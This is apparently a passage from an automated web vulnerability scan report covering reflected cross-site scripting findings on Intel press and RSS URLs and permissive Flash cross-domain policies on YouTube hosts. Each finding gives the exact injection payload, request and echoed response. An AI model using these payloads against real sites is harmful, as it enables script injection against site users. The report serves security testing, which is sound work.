The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131">
...[SNIP]...

4.90. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccbda"style%3d"x%3aexpression(alert(1))"cd785807712 was submitted in the REST URL parameter 2. This input was echoed as ccbda"style="x:expression(alert(1))"cd785807712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131ccbda"style%3d"x%3aexpression(alert(1))"cd785807712/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712">
...[SNIP]...

4.91. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa199"style%3d"x%3aexpression(alert(1))"23b41b411a was submitted in the REST URL parameter 3. This input was echoed as aa199"style="x:expression(alert(1))"23b41b411a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.comaa199"style%3d"x%3aexpression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours
Content-Length: 228
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours">
...[SNIP]...

4.92. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046 was submitted in the REST URL parameter 4. This input was echoed as fe8c1"style="x:expression(alert(1))"fc79ab44046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/communityfe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.93. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc99"style%3d"x%3aexpression(alert(1))"562e67141d2 was submitted in the REST URL parameter 5. This input was echoed as acc99"style="x:expression(alert(1))"562e67141d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroomacc99"style%3d"x%3aexpression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.94. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37 was submitted in the REST URL parameter 6. This input was echoed as 4b96e"style="x:expression(alert(1))"93e07c87b37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.95. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7 was submitted in the REST URL parameter 7. This input was echoed as 18bf7"style="x:expression(alert(1))"f7271d816f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.96. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9 was submitted in the REST URL parameter 8. This input was echoed as 26d6b"style="x:expression(alert(1))"911c05b74a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.97. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8768c"style%3d"x%3aexpression(alert(1))"82ed80d4031 was submitted in the REST URL parameter 9. This input was echoed as 8768c"style="x:expression(alert(1))"82ed80d4031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style%3d"x%3aexpression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.98. http://www.intel.com/pressroom/index.htm [iid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/index.htm

Issue detail

The value of the iid request parameter is copied into the HTML document as plain text between tags. The payload 97bc3<script>alert(1)</script>00808251755 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pressroom/index.htm?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755 HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755
Content-Length: 69
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=CDELKMPAGGGMGBKHKJPMODBH; path=/

iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755

4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cfeb6<script>alert(1)</script>8732c9cbc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pressroom/index.htm?cfeb6<script>alert(1)</script>8732c9cbc96=1 HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?cfeb6<script>alert(1)</script>8732c9cbc96=1
Content-Length: 43
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=CNNMGNPABDJEOBDKJLPLFJNJ; path=/

cfeb6<script>alert(1)</script>8732c9cbc96=1

5. Flash cross-domain policy  previous  next
There are 4 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://i.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: i.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:36 GMT
Expires: Wed, 09 Feb 2011 19:09:36 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 273794
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://gdata.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gdata.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: gdata.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 10 Sep 2010 10:34:33 GMT
Date: Sat, 05 Feb 2011 23:12:40 GMT
Expires: Sat, 05 Feb 2011 23:12:40 GMT
Cache-Control: private, max-age=7200
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Content-Length: 10055

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
